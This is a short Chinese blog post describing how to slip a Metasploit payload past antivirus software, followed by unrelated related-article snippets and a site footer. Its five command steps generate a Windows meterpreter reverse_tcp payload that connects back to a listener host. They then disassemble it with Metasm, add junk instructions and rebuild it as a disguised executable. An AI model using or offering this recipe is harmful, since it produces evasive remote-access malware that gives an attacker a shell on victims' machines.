安科网

使用Metasm来绕过杀毒软件

alittleyatou

alittleyatou

2014-09-30

关注 关注

技术本质还是花指令,本文的目的是使用metasploit框架来生成rawpayload,反汇编payload,使用花指令,然后重新编译成二进制可执行文件

1.msfpayloadwindows/meterpreter/reverse_tcpLHOST=192.168.1.100LPORT=443R>raw_binary

2.拷贝metasm.rb文件和metasm文件夹到ruby的安装目录

cp/usr/share/metasploit-framework/lib/metasm.rb/usr/local/lib/site_ruby/1.9.1/

cp-r/usr/share/metasploit-framework/lib/metasm/usr/local/lib/site_ruby/1.9.1/

3.ruby/usr/share/metasploit-framework/lib/metasm/samples/disassemble.rbraw_binary>test.asm

4.编辑花指令。关键一点,栈平衡

5.ruby/usr/local/lib/site_ruby/1.9.1/metasm/samples/peencode.rbtest.asm-ocoolstuff.exe

lib文件 lib 编程语言 ruby metasploit

alittleyatou

alittleyatou

0 关注 0 粉丝 0 动态

关注 关注

相关推荐

Linux安装软件时90%的人会遇到这个报错,如何解决?

提示 Could not get lock /var/lib/dpkg/lock 报错?这种时候大可不必惊慌,这些错误提示一般都是因为某些程序在系统后台进行着某些 apt 操作,因此锁定了 apt 数据库,所以暂时不能进行 apt 操作。那遇到这种情况,

heheeheh 2020-10-19

Docker 数据目录迁移解决方案

在docker的使用中随着下载镜像越来越多,构建镜像、运行容器越来越多, 数据目录必然会逐渐增大;当所有docker镜像、容器对磁盘的使用达到上限时,就需要对数据目录进行迁移。根据上面查到的路径,移动整个/var/lib/docker目录到数据盘的目的路径

tosim 2020-06-03

[linux]关于Ubuntu中Could not get lock /var/lib/dpkg/lock解决方案

最近在学习Linux命令,结果发现htop命令无法使用,于是决定安装,但是发现安装时报出如下的错误:。在经过一番搜索发现是因为文件锁定了,只需要删除锁定文件即可。锁定的文件会阻止 Linux 系统中某些文件或者数据的访问,这个概念也存在于 Windows

lfjjia 2020-05-19

lib.exe 根据.def文件生成.LIB文件(SQLite3)

从网上下载的一般都是SQLite3.dll和SQLite3.def文件,而在VC++6.0下还需要使用.lib文件。所以,我们首先需要自己生成.lib文件。一般都在C:\Program Files \Microsoft Visual Studio\2017

MFCJCK 2020-05-05

javaee使用mybatis时,导入包org.apache.ibatis.io.Resources报错

我在lib文件夹下面添加了包,但是在test类中编写代码时报错,原因找到了就是要buildpath一下,就是右键点击lib文件夹下面的jar包-->buildpath. 我通过Eclipse的 User Libranry 将jar导入 Eclipse

无情的你无情的雨 2020-04-07

docker的/var/lib/docker目录迁移

不知道 配置文件在哪里可以使用systemd 命令显示一下.

baixiaoshi 2020-01-30

linux动态链接库的使用

如果每次都需要指明路径未免太麻烦了,实际上gcc默认会有一个默认搜索路径,它会首先在该路径中进行搜索,该路径通常是/lib 或者/usr/lib目录.ld.so.conf是运行时的动态链接,与编译时的链接动作无关,所以修改里面的conf文件是无法让gcc找

安得情怀似旧时 2020-01-29

Linux中error while loading shared libraries错误解决办法

默认情况下,编译器只会使用/lib和/usr/lib这两个目录下的库文件,通常通过源码包进行安装时,如果不指定--prefix,会将库安装在/usr/local/lib目录下;当运行程序需要链接动态库时,提示找不到相关的.so库,会报错。也就是说,/usr

老谢的自留地 2020-01-10

Python3 中 的 绝对导入 与 相对导入

在学习tf的时候,看到了from __future__ import absolute_import,所以登记学习一下。在 Python 程序启动时进行配置,自动将 top-level file 的 home 目录、PYTHONPATH 设置的目录、.pt

oXiaoChong 2020-01-04

openssl 和libcurl的安装

cc="-fPIC" ./configure --disable-shared --enable-static --disable-ftp --disable-ipv6 --disable-rtsp --disable-tftp --d

wytzsjzly 2019-12-04

Ubuntu 将Python从默认的2.7升级到3.* 版本

由于目前的服务器系统会带python2.7 和python3.*两个版本,但是默认python2.7,如果想改变下默认,下面为你提供下更换默认版本的思路方法。因为Ubuntu很多底层采用的是Python2.*,Python3和Python2是互相不兼容的,

数据齿轮 2020-06-25

LUA文件夹组织包

那么调用 require 时就会尝试打开以下文件目录去搜索目标。

taoqilin 2020-02-29

solr7.7.0 添加core (二)

1 接上篇 solr 环境搭建(一),在schema.xml下面有一个感叹号!主要是修改contrib目录,dist目录的相对位置。instanceDir文件夹里会自动生成一个core.properties文件。以后再次需要创建solrCore核心的时候,

wsxsxz 2020-01-09

动态编译php的mysql扩展

经查,问题是64位系统中 libmysqlclient 默认安装到了 /usr/lib64/mysql/ 目录下

xiaopc 2013-04-12

安装caffe碰到的坑(各种.so未找到)

解决办法是依据出现错误的顺序而给出的,为了方便,可以直接先执行所有解决办法后再安装caffe。

88771433 2019-12-24

jmeter 5.2下载binary版本后直接解压报错

jmeter 5.2下载binary版本后直接解压报错,是因为没有配置环境变量,MAC版本配置环境变量:。打开Terminal--终端,输入vi ~/.bash_profile,回车,打开~/.bash_profile文件:输入“i”,进入insert模式

Cherishyuu 2019-12-23

python基础教程:模块高级技巧

上一节,我们讲解了Python模块的基础知识,这一节我们继续深入了解模块的更多知识,从而让大家全面了解、掌握和运用模块到我们实际的编程中。在上一节中有一句话“接着我们在这个文件所在目录运行Python解释器IPython”,不知道大家还记不记得。这就话背后

leoaran 2019-11-19

Ubuntu 9.10安装Eclipse和CDT

Ubuntu在安装时,如同大部分Linux发行版一样,都会同时安装GNU版本的Java。这个Java的实用程度太低,尤其对于开发人员来说,是没有太多用处的。在Ubuntu下,安装SUNJava是一件很容易的事情。安装完毕之后,选择默认java:sudoup

程序媛一枚 2010-04-06

Ubuntu 10.04下载安装Android 2.2 froyo 源码

在Android 编译中要是用的是 jdk 1.5,下面的是一个已jdk1.6的例子。实际使用中应该以1.5为标准。首先,从这里下载jdk,我的版本是jdk1.5.,我下载的是bin文件,我将下载的jdk1.6.0_12.bin文件置/usr/lib/jv

HLW0 2011-03-05

Moto E6——Linux下交叉编译环境建立

Linux下操作: --注意linux下的操作,字母有大小写的区分!把手机中usr/lib/libezx*.*文件和usr/lib/ezx/lib/*.*.复制到qt-2.3.8的lib里。a. 在tmake-1.11/lib/qws里,把linux-ar

amethystqi 2010-12-16
alittleyatou

alittleyatou

W3CSchool教程
HTML 教程
CSS 教程
Bootstrap 教程
Javascript 教程
jQuery 教程
后端教程
C 教程
Java 教程
PHP 教程
Python 教程
Go 教程
移动开发
Android 教程
Swift 教程
Kotlin 教程
jQuery Mobile 教程
ionic 教程
关于我们
新闻动态
联系方式
招聘英才
安科实验室
帮助与反馈

安科网(Ancii),中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号 京公网安备11010802014868号